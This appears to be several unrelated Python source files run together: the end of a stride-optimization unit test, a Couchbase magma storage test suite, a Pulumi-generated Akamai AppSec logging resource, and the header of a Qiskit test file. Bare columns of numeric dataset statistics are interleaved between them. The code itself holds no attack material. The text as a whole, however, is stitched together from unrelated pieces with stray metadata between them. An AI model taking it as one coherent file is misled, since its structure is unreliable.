                             'conv_2_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
                             'conv_2': {'kernel_spatial': np.array([1, 1]),
                                        'stride': np.array([1, 1, 2, 2]),
                                        'output': np.array([3]), },
                             'conv_2_data': {'shape': np.array([1, 3, 112, 112])},
                             'conv_3_w': {'value': np.zeros([3, 3, 3, 3]), 'shape': np.array([3, 3, 3, 3])},
                             'conv_3': {'kernel_spatial': np.array([3, 3]),
                                        'stride': np.array([1, 1, 1, 1]),
                                        'output': np.array([3]), },
                             'conv_3_data': {'shape': np.array([1, 3, 110, 110])},
                             'conv_4_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
                             'conv_4': {'kernel_spatial': np.array([1, 1]),
                                        'stride': np.array([1, 1, 2, 2]),
                                        'output': np.array([3]), },
                             'conv_4_data': {'shape': np.array([1, 3, 55, 55])},
                             },
                            nodes_with_edges_only=True)
        # Expected chain after optimization: 1x1/s2 -> 1x1/s1 -> 3x3/s2 -> 1x1/s1.
        graph_ref = build_graph(nodes_attributes,
                                [('placeholder_1', 'placeholder_1_data'),
                                 ('placeholder_1_data', 'conv_1'),
                                 ('conv_1_w', 'conv_1'),
                                 ('conv_1_b', 'conv_1'),
                                 ('conv_1', 'conv_1_data'),
                                 ('conv_1_data', 'conv_2'),
                                 ('conv_2_w', 'conv_2'),
                                 ('conv_2_b', 'conv_2'),
                                 ('conv_2', 'conv_2_data'),
                                 ('conv_2_data', 'conv_3'),
                                 ('conv_3_w', 'conv_3'),
                                 ('conv_3_b', 'conv_3'),
                                 ('conv_3', 'conv_3_data'),
                                 ('conv_3_data', 'conv_4'),
                                 ('conv_4_w', 'conv_4'),
                                 ('conv_4_b', 'conv_4'),
                                 ('conv_4', 'conv_4_data'),
                                 ],
                                {'placeholder_1_data': {'shape': np.array([1, 3, 224, 224])},
                                 'conv_1_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
                                 'conv_1': {'kernel_spatial': np.array([1, 1]),
                                            'stride': np.array([1, 1, 2, 2]),
                                            'output': np.array([3])},
                                 'conv_1_data': {'shape': np.array([1, 3, 112, 112])},
                                 'conv_2_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
                                 'conv_2': {'kernel_spatial': np.array([1, 1]),
                                            'stride': np.array([1, 1, 1, 1]),
                                            'output': np.array([3])},
                                 'conv_2_data': {'shape': np.array([1, 3, 112, 112])},
                                 'conv_3_w': {'value': np.zeros([3, 3, 3, 3]), 'shape': np.array([3, 3, 3, 3])},
                                 'conv_3': {'kernel_spatial': np.array([3, 3]),
                                            'stride': np.array([1, 1, 2, 2]),
                                            'output': np.array([3])},
                                 'conv_3_data': {'shape': np.array([1, 3, 55, 55])},
                                 'conv_4_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
                                 'conv_4': {'kernel_spatial': np.array([1, 1]),
                                            'stride': np.array([1, 1, 1, 1]),
                                            'output': np.array([3])},
                                 'conv_4_data': {'shape': np.array([1, 3, 55, 55])},
                                 },
                                nodes_with_edges_only=True)
        graph.graph['layout'] = 'NCHW'
        graph_ref.graph['layout'] = 'NCHW'
        stride_optimization(graph)
        # Compare the transformed graph to the reference up to conv_4_data,
        # including op attributes (strides, kernels, shapes).
        (flag, resp) = compare_graphs(graph, graph_ref, 'conv_4_data', check_op_attrs=True)
        self.assertTrue(flag, resp)
| 56.344882
| 120
| 0.384276
| 3,765
| 35,779
| 3.374768
| 0.037716
| 0.114592
| 0.073036
| 0.039666
| 0.925153
| 0.91807
| 0.909806
| 0.896584
| 0.858177
| 0.850386
| 0
| 0.07912
| 0.441153
| 35,779
| 634
| 121
| 56.433754
| 0.556339
| 0.031219
| 0
| 0.843137
| 0
| 0
| 0.225411
| 0.006207
| 0
| 0
| 0
| 0
| 0.011765
| 1
| 0.011765
| false
| 0.001961
| 0.017647
| 0
| 0.031373
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dbd2bf2c66c1b2d69f4ee0636c49b8d4c5b451df
| 14,077
|
py
|
Python
|
pytests/storage/magma/magma_basic_crud.py
|
ashwin2002/TAF
|
4223787a1f4c0fe9fa841543020b48ada9ade9e3
|
[
"Apache-2.0"
] | null | null | null |
pytests/storage/magma/magma_basic_crud.py
|
ashwin2002/TAF
|
4223787a1f4c0fe9fa841543020b48ada9ade9e3
|
[
"Apache-2.0"
] | null | null | null |
pytests/storage/magma/magma_basic_crud.py
|
ashwin2002/TAF
|
4223787a1f4c0fe9fa841543020b48ada9ade9e3
|
[
"Apache-2.0"
] | null | null | null |
from Cb_constants.CBServer import CbServer
from couchbase_helper.documentgenerator import doc_generator
from magma_base import MagmaBaseTest
class BasicCrudTests(MagmaBaseTest):
    """Basic CRUD tests for buckets backed by the magma storage engine."""

    def setUp(self):
        # Base class provisions the cluster/bucket and does the initial load.
        super(BasicCrudTests, self).setUp()
        # NOTE(review): presumably adjusts swap on every node so magma has
        # headroom under memory pressure -- confirm against MagmaBaseTest.
        self.change_swap_space(self.cluster.nodes_in_cluster)
        # Pre-build generators for the mixed update/read/delete workload.
        self.generate_docs(doc_ops="update:read:delete")
        # Remember the initial item count before any test mutates num_items.
        self.items = self.num_items

    def tearDown(self):
        super(BasicCrudTests, self).tearDown()
def test_MB_38315(self):
self.log.info("Deleting half of the items")
self.doc_ops = "delete"
self.generate_docs(doc_ops=self.doc_ops,
delete_start=0, delete_end=self.num_items/2)
_ = self.loadgen_docs(self.retry_exceptions,
self.ignore_exceptions)
self.log.info("Verifying doc counts after create doc_ops")
self.bucket_util._wait_for_stats_all_buckets()
self.bucket_util.verify_stats_all_buckets(self.num_items)
tasks_info = self.bucket_util._async_validate_docs(
self.cluster, self.gen_delete, "delete", 0,
batch_size=self.batch_size,
process_concurrency=self.process_concurrency,
timeout_secs=self.sdk_timeout,
retry_exceptions=self.retry_exceptions,
ignore_exceptions=self.ignore_exceptions)
for task in tasks_info:
self.task_manager.get_task_result(task)
def test_drop_collections_after_upserts(self):
"""
Test will check space
Amplification after collection drop
!) Create multiple collections
2) Load docs in all collections
3) Drop a collections
4)Verify space amplification
"""
scope_name = CbServer.default_scope
collection_prefix = "FunctionCollection"
# # # # Non Default Scope creation # # # #
if self.num_scopes > 1:
scope_name = "FunctionScope"
self.bucket_util.create_scope(self.cluster.master,
self.buckets[0],
{"name": scope_name})
# # # # Collections Creation # # # #
for i in range(self.num_collections):
collection_name = collection_prefix + str(i)
self.log.info("Creating scope::collection {} {}\
".format(scope_name, collection_name))
self.bucket_util.create_collection(
self.cluster.master, self.buckets[0],
scope_name, {"name": collection_name})
self.sleep(2)
collections = self.buckets[0].scopes[scope_name].collections.keys()
if self.num_collections > 1 and scope_name is CbServer.default_scope:
collections.remove(CbServer.default_collection)
self.log.info("List of collections {}".format(collections))
# # # # DOC LOADING # # # #
end = 0
init_items = self.num_items
tasks_info = dict()
self.doc_ops = "create"
for collection in collections:
start = end
end += init_items
self.gen_create = doc_generator(
self.key, start, end,
doc_size=self.doc_size,
doc_type=self.doc_type,
target_vbucket=self.target_vbucket,
vbuckets=self.cluster_util.vbuckets,
key_size=self.key_size,
randomize_doc_size=self.randomize_doc_size,
randomize_value=self.randomize_value,
mix_key_size=self.mix_key_size,
deep_copy=self.deep_copy)
tem_tasks_info = self.loadgen_docs(
self.retry_exceptions,
self.ignore_exceptions,
scope=scope_name,
collection=collection,
_sync=False)
tasks_info.update(tem_tasks_info.items())
self.num_items -= init_items
for task in tasks_info:
self.task_manager.get_task_result(task)
self.bucket_util.verify_doc_op_task_exceptions(
tasks_info, self.cluster)
self.bucket_util.log_doc_ops_task_failures(tasks_info)
self.log.info("Verifying num_items counts after doc_ops")
self.bucket_util._wait_for_stats_all_buckets()
self.bucket_util.verify_stats_all_buckets(self.num_items)
# # # # Initial Disk Usage # # # #
disk_usage = self.get_disk_usage(
self.buckets[0], self.cluster.nodes_in_cluster)
self.disk_usage[self.buckets[0].name] = disk_usage[0]
self.log.info(
"For bucket {} disk usage after initial '\n' \
creation is {}MB".format(
self.buckets[0].name,
self.disk_usage[self.buckets[0].name]))
# # # # Update docs in a single collection # # # #
count = 0
mutated = 1
self.doc_ops = "update"
self.log.info("Docs to be updated in collection {}\
".format(collections[-1]))
while count < self.test_itr:
self.gen_update = doc_generator(
self.key, start, end,
doc_size=self.doc_size,
doc_type=self.doc_type,
target_vbucket=self.target_vbucket,
vbuckets=self.cluster_util.vbuckets,
key_size=self.key_size,
mutate=mutated,
randomize_doc_size=self.randomize_doc_size,
randomize_value=self.randomize_value,
mix_key_size=self.mix_key_size,
deep_copy=self.deep_copy)
_ = self.loadgen_docs(self.retry_exceptions,
self.ignore_exceptions,
scope=scope_name,
collection=collections[-1],
_sync=True)
self.log.info("Waiting for ep-queues to get drained")
self.bucket_util._wait_for_stats_all_buckets()
count += 1
# # # # Drop a collection # # # #
self.log.info("Collection to be dropped {}\
".format(collections[0]))
self.bucket_util.drop_collection(
self.cluster.master, self.buckets[0],
scope_name=scope_name,
collection_name=collections[0])
self.buckets[0].scopes[scope_name].collections.pop(collections[0])
collections.remove(collections[0])
# # # # Space Amplification check # # # #
_result = self.check_fragmentation_using_magma_stats(
self.buckets[0], self.cluster.nodes_in_cluster)
self.assertIs(_result, True,
"Fragmentation value exceeds from '\n' \
the configured fragementaion value")
_r = self.check_fragmentation_using_bucket_stats(
self.buckets[0], self.cluster.nodes_in_cluster)
self.assertIs(_r, True,
"Fragmentation value exceeds from '\n' \
the configured fragementaion value")
disk_usage = self.get_disk_usage(
self.buckets[0], self.cluster.nodes_in_cluster)
_res = disk_usage[0]
self.assertIs(
_res > 2.5 * self.disk_usage[
self.disk_usage.keys()[0]],
False, "Disk Usage {}MB '\n' \
exceeds Actual'\n' \
disk usage {}MB by 2.5'\n' \
times".format(
_res,
self.disk_usage[self.disk_usage.keys()[0]]))
# # # # Space Amplification check ends # # # #
self.log.info("====test_drop_collections_after_upserts====")
def test_drop_collections_after_deletes(self):
"""
Test will check space
Amplification after collection drop
!) Create multiple collections
2) Load docs in all collections
3) Delete 3/4th of docs in one collection
4) Since default frag is 50, auto compaction shouldn't trigger
5) Drop a collection
6)Auto compaction shoudl trigger now, Verify space amplification
"""
scope_name = CbServer.default_scope
collection_prefix = "FunctionCollection"
# # # # Non Default Scope creation # # # #
if self.num_scopes > 1:
scope_name = "FunctionScope"
self.bucket_util.create_scope(self.cluster.master,
self.buckets[0],
{"name": scope_name})
# # # # Collections Creation # # # #
for i in range(self.num_collections):
collection_name = collection_prefix + str(i)
self.log.info("Creating scope::collection {} {}\
".format(scope_name, collection_name))
self.bucket_util.create_collection(
self.cluster.master, self.buckets[0],
scope_name, {"name": collection_name})
self.sleep(2)
collections = self.buckets[0].scopes[scope_name].collections.keys()
if self.num_collections > 1 and scope_name is CbServer.default_scope:
collections.remove(CbServer.default_collection)
self.log.info("List of collections {}".format(collections))
# # # # DOC LOADING # # # #
end = 0
init_items = self.num_items
tasks_info = dict()
self.doc_ops = "create"
for collection in collections:
start = end
end += init_items
self.gen_create = doc_generator(
self.key, start, end,
doc_size=self.doc_size,
doc_type=self.doc_type,
target_vbucket=self.target_vbucket,
vbuckets=self.cluster_util.vbuckets,
key_size=self.key_size,
randomize_doc_size=self.randomize_doc_size,
randomize_value=self.randomize_value,
mix_key_size=self.mix_key_size,
deep_copy=self.deep_copy)
tem_tasks_info = self.loadgen_docs(
self.retry_exceptions,
self.ignore_exceptions,
scope=scope_name,
collection=collection,
_sync=False)
tasks_info.update(tem_tasks_info.items())
self.num_items -= init_items
for task in tasks_info:
self.task_manager.get_task_result(task)
self.bucket_util.verify_doc_op_task_exceptions(
tasks_info, self.cluster)
self.bucket_util.log_doc_ops_task_failures(tasks_info)
self.log.info("Verifying num_items counts after doc_ops")
self.bucket_util._wait_for_stats_all_buckets()
self.bucket_util.verify_stats_all_buckets(self.num_items)
# # # # Initial Disk Usage # # # #
disk_usage = self.get_disk_usage(
self.buckets[0], self.cluster.nodes_in_cluster)
self.disk_usage[self.buckets[0].name] = disk_usage[0]
self.log.info(
"For bucket {} disk usage after initial '\n' \
creation is {}MB".format(
self.buckets[0].name,
self.disk_usage[self.buckets[0].name]))
# Space amplification check before deletes
# This check is to make sure, compaction doesn't get triggerd
_result = self.check_fragmentation_using_magma_stats(
self.buckets[0], self.cluster.nodes_in_cluster)
self.assertIs(_result, True,
"Fragmentation value exceeds from '\n' \
the configured fragementaion value")
_r = self.check_fragmentation_using_bucket_stats(
self.buckets[0], self.cluster.nodes_in_cluster)
self.assertIs(_r, True,
"Fragmentation value exceeds from '\n' \
the configured fragementaion value")
# # # # Delete 3/4th docs in a single collection # # # #
self.doc_ops = "delete"
self.log.info("For deletion collection picked is {} \
".format(collections[-1]))
self.gen_delete = doc_generator(
self.key, start, start + int(0.75 * (end-start)),
doc_size=self.doc_size,
doc_type=self.doc_type,
target_vbucket=self.target_vbucket,
vbuckets=self.cluster_util.vbuckets,
key_size=self.key_size,
randomize_doc_size=self.randomize_doc_size,
randomize_value=self.randomize_value,
mix_key_size=self.mix_key_size,
deep_copy=self.deep_copy)
_ = self.loadgen_docs(self.retry_exceptions,
self.ignore_exceptions,
scope=scope_name,
collection=collections[-1],
_sync=True)
self.log.info("Waiting for ep-queues to get drained")
self.bucket_util._wait_for_stats_all_buckets()
# # # # Drop a collection # # # #
self.log.info("Collection to be dropped {}\
".format(collections[0]))
self.bucket_util.drop_collection(
self.cluster.master, self.buckets[0],
scope_name=scope_name,
collection_name=collections[0])
self.buckets[0].scopes[scope_name].collections.pop(collections[0])
collections.remove(collections[0])
# # # # Space Amplification check # # # #
_result = self.check_fragmentation_using_magma_stats(
self.buckets[0], self.cluster.nodes_in_cluster)
self.assertIs(_result, True,
"Fragmentation value exceeds from '\n' \
the configured fragementaion value")
_r = self.check_fragmentation_using_bucket_stats(
self.buckets[0], self.cluster.nodes_in_cluster)
self.assertIs(_r, True,
"Fragmentation value exceeds from '\n' \
the configured fragementaion value")
# # # # Space Amplification check ends # # # #
self.log.info("====test_drop_collections_after_deletes====")
| 42.917683
| 77
| 0.586418
| 1,563
| 14,077
| 5.015355
| 0.120282
| 0.035081
| 0.03827
| 0.022962
| 0.845388
| 0.815155
| 0.811456
| 0.811456
| 0.803546
| 0.796658
| 0
| 0.008603
| 0.322867
| 14,077
| 327
| 78
| 43.04893
| 0.813785
| 0.076579
| 0
| 0.812261
| 0
| 0
| 0.039535
| 0.006759
| 0
| 0
| 0
| 0
| 0.02682
| 1
| 0.019157
| false
| 0
| 0.011494
| 0
| 0.034483
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dbd307a3faaff0cec21361b697c9bf3126b647c1
| 16,564
|
py
|
Python
|
sdk/python/pulumi_akamai/app_sec_advanced_settings_logging.py
|
pulumi/pulumi-akamai
|
85f933ccf2f61738b3074a13fa718132280f8364
|
[
"ECL-2.0",
"Apache-2.0"
] | 3
|
2021-01-21T15:22:12.000Z
|
2021-08-25T14:15:29.000Z
|
sdk/python/pulumi_akamai/app_sec_advanced_settings_logging.py
|
pulumi/pulumi-akamai
|
85f933ccf2f61738b3074a13fa718132280f8364
|
[
"ECL-2.0",
"Apache-2.0"
] | 59
|
2020-08-13T14:39:36.000Z
|
2022-03-31T15:19:48.000Z
|
sdk/python/pulumi_akamai/app_sec_advanced_settings_logging.py
|
pulumi/pulumi-akamai
|
85f933ccf2f61738b3074a13fa718132280f8364
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['AppSecAdvancedSettingsLoggingArgs', 'AppSecAdvancedSettingsLogging']
@pulumi.input_type
class AppSecAdvancedSettingsLoggingArgs:
    # Auto-generated by the Pulumi Terraform Bridge (tfgen); do not restyle
    # by hand -- regeneration would clobber manual changes.
    def __init__(__self__, *,
                 config_id: pulumi.Input[int],
                 logging: pulumi.Input[str],
                 security_policy_id: Optional[pulumi.Input[str]] = None):
        """
        The set of arguments for constructing a AppSecAdvancedSettingsLogging resource.
        :param pulumi.Input[int] config_id: . Unique identifier of the security configuration containing the logging settings being modified.
        :param pulumi.Input[str] logging: . Path to a JSON file containing the logging settings to be configured. A sample JSON file can be found in the [Modify HTTP header log settings for a configuration](https://developer.akamai.com/api/cloud_security/application_security/v1.html#puthttpheaderloggingforaconfiguration) section of the Application Security API documentation.
        :param pulumi.Input[str] security_policy_id: . Unique identifier of the security policies whose settings are being modified. If not included, the logging settings are modified at the configuration scope and, as a result, apply to all the security policies associated with the configuration.
        """
        pulumi.set(__self__, "config_id", config_id)
        pulumi.set(__self__, "logging", logging)
        # security_policy_id is optional: omitting it applies the settings
        # at configuration scope.
        if security_policy_id is not None:
            pulumi.set(__self__, "security_policy_id", security_policy_id)

    @property
    @pulumi.getter(name="configId")
    def config_id(self) -> pulumi.Input[int]:
        """
        . Unique identifier of the security configuration containing the logging settings being modified.
        """
        return pulumi.get(self, "config_id")

    @config_id.setter
    def config_id(self, value: pulumi.Input[int]):
        pulumi.set(self, "config_id", value)

    @property
    @pulumi.getter
    def logging(self) -> pulumi.Input[str]:
        """
        . Path to a JSON file containing the logging settings to be configured. A sample JSON file can be found in the [Modify HTTP header log settings for a configuration](https://developer.akamai.com/api/cloud_security/application_security/v1.html#puthttpheaderloggingforaconfiguration) section of the Application Security API documentation.
        """
        return pulumi.get(self, "logging")

    @logging.setter
    def logging(self, value: pulumi.Input[str]):
        pulumi.set(self, "logging", value)

    @property
    @pulumi.getter(name="securityPolicyId")
    def security_policy_id(self) -> Optional[pulumi.Input[str]]:
        """
        . Unique identifier of the security policies whose settings are being modified. If not included, the logging settings are modified at the configuration scope and, as a result, apply to all the security policies associated with the configuration.
        """
        return pulumi.get(self, "security_policy_id")

    @security_policy_id.setter
    def security_policy_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "security_policy_id", value)
@pulumi.input_type
class _AppSecAdvancedSettingsLoggingState:
    # Auto-generated by the Pulumi Terraform Bridge (tfgen); do not restyle
    # by hand -- regeneration would clobber manual changes.
    def __init__(__self__, *,
                 config_id: Optional[pulumi.Input[int]] = None,
                 logging: Optional[pulumi.Input[str]] = None,
                 security_policy_id: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering AppSecAdvancedSettingsLogging resources.
        :param pulumi.Input[int] config_id: . Unique identifier of the security configuration containing the logging settings being modified.
        :param pulumi.Input[str] logging: . Path to a JSON file containing the logging settings to be configured. A sample JSON file can be found in the [Modify HTTP header log settings for a configuration](https://developer.akamai.com/api/cloud_security/application_security/v1.html#puthttpheaderloggingforaconfiguration) section of the Application Security API documentation.
        :param pulumi.Input[str] security_policy_id: . Unique identifier of the security policies whose settings are being modified. If not included, the logging settings are modified at the configuration scope and, as a result, apply to all the security policies associated with the configuration.
        """
        # All state inputs are optional: only set the ones provided.
        if config_id is not None:
            pulumi.set(__self__, "config_id", config_id)
        if logging is not None:
            pulumi.set(__self__, "logging", logging)
        if security_policy_id is not None:
            pulumi.set(__self__, "security_policy_id", security_policy_id)

    @property
    @pulumi.getter(name="configId")
    def config_id(self) -> Optional[pulumi.Input[int]]:
        """
        . Unique identifier of the security configuration containing the logging settings being modified.
        """
        return pulumi.get(self, "config_id")

    @config_id.setter
    def config_id(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "config_id", value)

    @property
    @pulumi.getter
    def logging(self) -> Optional[pulumi.Input[str]]:
        """
        . Path to a JSON file containing the logging settings to be configured. A sample JSON file can be found in the [Modify HTTP header log settings for a configuration](https://developer.akamai.com/api/cloud_security/application_security/v1.html#puthttpheaderloggingforaconfiguration) section of the Application Security API documentation.
        """
        return pulumi.get(self, "logging")

    @logging.setter
    def logging(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "logging", value)

    @property
    @pulumi.getter(name="securityPolicyId")
    def security_policy_id(self) -> Optional[pulumi.Input[str]]:
        """
        . Unique identifier of the security policies whose settings are being modified. If not included, the logging settings are modified at the configuration scope and, as a result, apply to all the security policies associated with the configuration.
        """
        return pulumi.get(self, "security_policy_id")

    @security_policy_id.setter
    def security_policy_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "security_policy_id", value)
class AppSecAdvancedSettingsLogging(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
config_id: Optional[pulumi.Input[int]] = None,
logging: Optional[pulumi.Input[str]] = None,
security_policy_id: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
**Scopes**: Security configuration; security policy
Enables, disables, or updates HTTP header logging settings. By default, this operation applies at the configuration level, which means that it applies to all the security policies within that configuration. However, by using the `security_policy_id` parameter you can specify custom settings for an individual security policy.
**Related API Endpoint**: [/appsec/v1/configs/{configId}/versions/{versionNumber}/advanced-settings/logging](https://developer.akamai.com/api/cloud_security/application_security/v1.html#puthttpheaderlogging)
## Example Usage
Basic usage:
```python
import pulumi
import pulumi_akamai as akamai
configuration = akamai.get_app_sec_configuration(name="Documentation")
logging = akamai.AppSecAdvancedSettingsLogging("logging",
config_id=configuration.config_id,
logging=(lambda path: open(path).read())(f"{path['module']}/logging.json"))
# USE CASE: User wants to configure logging settings for a security policy.
policy_logging = akamai.AppSecAdvancedSettingsLogging("policyLogging",
config_id=configuration.config_id,
security_policy_id="gms1_134637",
logging=(lambda path: open(path).read())(f"{path['module']}/logging.json"))
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[int] config_id: . Unique identifier of the security configuration containing the logging settings being modified.
:param pulumi.Input[str] logging: . Path to a JSON file containing the logging settings to be configured. A sample JSON file can be found in the [Modify HTTP header log settings for a configuration](https://developer.akamai.com/api/cloud_security/application_security/v1.html#puthttpheaderloggingforaconfiguration) section of the Application Security API documentation.
:param pulumi.Input[str] security_policy_id: . Unique identifier of the security policies whose settings are being modified. If not included, the logging settings are modified at the configuration scope and, as a result, apply to all the security policies associated with the configuration.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: AppSecAdvancedSettingsLoggingArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
**Scopes**: Security configuration; security policy
Enables, disables, or updates HTTP header logging settings. By default, this operation applies at the configuration level, which means that it applies to all the security policies within that configuration. However, by using the `security_policy_id` parameter you can specify custom settings for an individual security policy.
**Related API Endpoint**: [/appsec/v1/configs/{configId}/versions/{versionNumber}/advanced-settings/logging](https://developer.akamai.com/api/cloud_security/application_security/v1.html#puthttpheaderlogging)
## Example Usage
Basic usage:
```python
import pulumi
import pulumi_akamai as akamai
configuration = akamai.get_app_sec_configuration(name="Documentation")
logging = akamai.AppSecAdvancedSettingsLogging("logging",
config_id=configuration.config_id,
logging=(lambda path: open(path).read())(f"{path['module']}/logging.json"))
# USE CASE: User wants to configure logging settings for a security policy.
policy_logging = akamai.AppSecAdvancedSettingsLogging("policyLogging",
config_id=configuration.config_id,
security_policy_id="gms1_134637",
logging=(lambda path: open(path).read())(f"{path['module']}/logging.json"))
```
:param str resource_name: The name of the resource.
:param AppSecAdvancedSettingsLoggingArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(AppSecAdvancedSettingsLoggingArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
config_id: Optional[pulumi.Input[int]] = None,
logging: Optional[pulumi.Input[str]] = None,
security_policy_id: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = AppSecAdvancedSettingsLoggingArgs.__new__(AppSecAdvancedSettingsLoggingArgs)
if config_id is None and not opts.urn:
raise TypeError("Missing required property 'config_id'")
__props__.__dict__["config_id"] = config_id
if logging is None and not opts.urn:
raise TypeError("Missing required property 'logging'")
__props__.__dict__["logging"] = logging
__props__.__dict__["security_policy_id"] = security_policy_id
super(AppSecAdvancedSettingsLogging, __self__).__init__(
'akamai:index/appSecAdvancedSettingsLogging:AppSecAdvancedSettingsLogging',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
config_id: Optional[pulumi.Input[int]] = None,
logging: Optional[pulumi.Input[str]] = None,
security_policy_id: Optional[pulumi.Input[str]] = None) -> 'AppSecAdvancedSettingsLogging':
"""
Get an existing AppSecAdvancedSettingsLogging resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[int] config_id: . Unique identifier of the security configuration containing the logging settings being modified.
:param pulumi.Input[str] logging: . Path to a JSON file containing the logging settings to be configured. A sample JSON file can be found in the [Modify HTTP header log settings for a configuration](https://developer.akamai.com/api/cloud_security/application_security/v1.html#puthttpheaderloggingforaconfiguration) section of the Application Security API documentation.
:param pulumi.Input[str] security_policy_id: . Unique identifier of the security policies whose settings are being modified. If not included, the logging settings are modified at the configuration scope and, as a result, apply to all the security policies associated with the configuration.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _AppSecAdvancedSettingsLoggingState.__new__(_AppSecAdvancedSettingsLoggingState)
__props__.__dict__["config_id"] = config_id
__props__.__dict__["logging"] = logging
__props__.__dict__["security_policy_id"] = security_policy_id
return AppSecAdvancedSettingsLogging(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="configId")
def config_id(self) -> pulumi.Output[int]:
"""
. Unique identifier of the security configuration containing the logging settings being modified.
"""
return pulumi.get(self, "config_id")
@property
@pulumi.getter
def logging(self) -> pulumi.Output[str]:
"""
. Path to a JSON file containing the logging settings to be configured. A sample JSON file can be found in the [Modify HTTP header log settings for a configuration](https://developer.akamai.com/api/cloud_security/application_security/v1.html#puthttpheaderloggingforaconfiguration) section of the Application Security API documentation.
"""
return pulumi.get(self, "logging")
@property
@pulumi.getter(name="securityPolicyId")
def security_policy_id(self) -> pulumi.Output[Optional[str]]:
"""
. Unique identifier of the security policies whose settings are being modified. If not included, the logging settings are modified at the configuration scope and, as a result, apply to all the security policies associated with the configuration.
"""
return pulumi.get(self, "security_policy_id")
| 57.117241
| 377
| 0.704117
| 1,956
| 16,564
| 5.780164
| 0.108896
| 0.041836
| 0.049531
| 0.029188
| 0.822041
| 0.808067
| 0.802494
| 0.782682
| 0.774456
| 0.773748
| 0
| 0.001994
| 0.21269
| 16,564
| 289
| 378
| 57.314879
| 0.864964
| 0.527228
| 0
| 0.59589
| 1
| 0
| 0.108988
| 0.023071
| 0
| 0
| 0
| 0
| 0
| 1
| 0.150685
| false
| 0.006849
| 0.034247
| 0
| 0.273973
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
91db2b2b058bcbace267a6750d2a10e1c9ba8c20
| 12,228
|
py
|
Python
|
test/terra/reference/ref_initialize.py
|
eliarbel/qiskit-aer
|
827f8922948dd18a588e8617bccaec465934280f
|
[
"Apache-2.0"
] | 1
|
2019-12-12T07:58:14.000Z
|
2019-12-12T07:58:14.000Z
|
test/terra/reference/ref_initialize.py
|
BryceFuller/qiskit-aer
|
abd418e37359210e809a94e74db33f08ad053fd6
|
[
"Apache-2.0"
] | 29
|
2018-12-19T10:11:00.000Z
|
2018-12-19T10:16:18.000Z
|
test/terra/reference/ref_initialize.py
|
BryceFuller/qiskit-aer
|
abd418e37359210e809a94e74db33f08ad053fd6
|
[
"Apache-2.0"
] | null | null | null |
# This code is part of Qiskit.
#
# (C) Copyright IBM 2018, 2019.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""
Test circuits and reference outputs for initialize instruction.
"""
from numpy import array, sqrt
from qiskit import QuantumRegister, ClassicalRegister, QuantumCircuit
